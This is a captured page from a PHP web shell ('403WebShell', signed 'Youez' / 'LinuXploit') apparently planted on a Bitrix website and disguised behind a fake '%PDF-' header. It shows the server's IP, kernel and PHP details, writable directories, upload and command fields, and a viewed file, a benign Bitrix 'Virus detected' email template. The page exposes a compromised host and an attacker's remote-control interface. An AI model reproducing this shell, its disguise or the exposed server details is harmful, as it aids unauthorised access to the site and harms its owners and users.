%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.14.142.131
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/security/lang/en/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/security/lang/en/install/events.php
<?
$MESS ['VIRUS_DETECTED_NAME'] = "Virus detected";
$MESS ['VIRUS_DETECTED_DESC'] = "#EMAIL# - Site administrator's e-mail address (from the Kernel module settings)";
$MESS ['VIRUS_DETECTED_SUBJECT'] = "#SITE_NAME#:  Virus detected";
$MESS ['VIRUS_DETECTED_MESSAGE'] = "Informational message from #SITE_NAME#

------------------------------------------

You have received this message as a result of the detection of potentially dangerous code by the proactive protection system of #SERVER_NAME#.

1.  The potentially dangerous code has been cut from the html. 
2.  Check the event log and make sure that the code is indeed harmful, and is not simply a counter or framework.
	(link: http://#SERVER_NAME#/bitrix/admin/event_log.php?lang=en&set_filter=Y&find_type=audit_type_id&find_audit_type[]=SECURITY_VIRUS )
3.  If the code is not harmful, add it to the 'exceptions' list on the antivirus settings page. 
	(link: http://#SERVER_NAME#/bitrix/admin/security_antivirus.php?lang=en&tabControl_active_tab=exceptions )
4.  If the code is a virus, then complete the following steps:

	a) Change the login password for the administrator and other responsible users to the site.
	b) Change the login password for ssh and ftp. 
	c) Test and remove viruses from computers of administrators who have access to the site through ssh or ftp. 
	d) Turn off password saving in programs which provide access to the site through ssh or ftp. 
	e) Delete the harmful code from the infected files.  For example, re-install the infected files using the most recent backup.  

---------------------------------------------------------------------
This message has been automatically generated.";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit